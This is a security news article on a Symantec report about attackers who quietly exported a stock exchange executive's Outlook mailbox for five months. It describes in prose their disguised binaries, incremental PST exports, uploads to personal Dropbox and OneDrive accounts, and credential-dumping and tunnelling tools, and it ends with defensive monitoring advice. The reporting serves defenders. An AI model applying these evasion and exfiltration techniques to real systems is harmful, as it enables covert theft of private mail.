Attackers Monitored Exchange Executive’s Outlook for Five Months

Unknown attackers had at least five months of access to a senior executive’s Outlook mailbox at a major global stock exchange, repeatedly exporting PST files and uploading them to personal Dropbox and OneDrive accounts, Symantec and Carbon Black’s Threat Hunter Team reported. The executive and the exchange were not named.

Security logs first showed malicious activity on October 10, 2025. By that date two binaries were running with SYSTEM privileges on the executive’s machine, one posing as Adobe’s updater and the other as OneDrive. Symantec assessed the initial foothold likely came from lateral movement off a previously compromised device; how the attacker first gained entry remains unknown.

On November 12 the intruder harvested a Dropbox API token and began uploading files using curl. The campaign used a mailbox stealer built on Aspose, a .NET library that reads Outlook OST and PST files. Packaged as an executable, the tool converted the mailbox to PST files, using a password and a date-range flag. The first extraction retrieved messages dating back to August 2025.

The attacker returned every two to four weeks, performing eight additional partial exports through February 17, 2026. Each export covered only the days since the previous run, producing a near-continuous copy while keeping each transfer small. For exfiltration the attacker used personal Dropbox and OneDrive accounts; OneDrive traffic went to hard-coded Microsoft IP addresses rather than the onedrive.live.com hostname to avoid generating DNS lookups. The attacker tested the public host temp.sh once in November and did not continue using it.

Symantec published indicators show other tools in the intruder’s toolkit, including FRPC for tunneling traffic, Secretsdump for extracting Windows credentials, SharpDecryptPwd for recovering saved application passwords, and a utility to bypass Windows User Account Control. The report does not link the artifacts to a known threat actor.

The last observed activity on March 19, 2026, was a staged backdoor that was prepared but not executed. Symantec reported no evidence that a software vulnerability produced a Common Vulnerabilities and Exposures entry for this incident. Symantec recommended monitoring for unusual mailbox exports, unexpected Outlook access, uploads to personal cloud accounts, tunneling activity and credential-dumping on systems used by privileged users.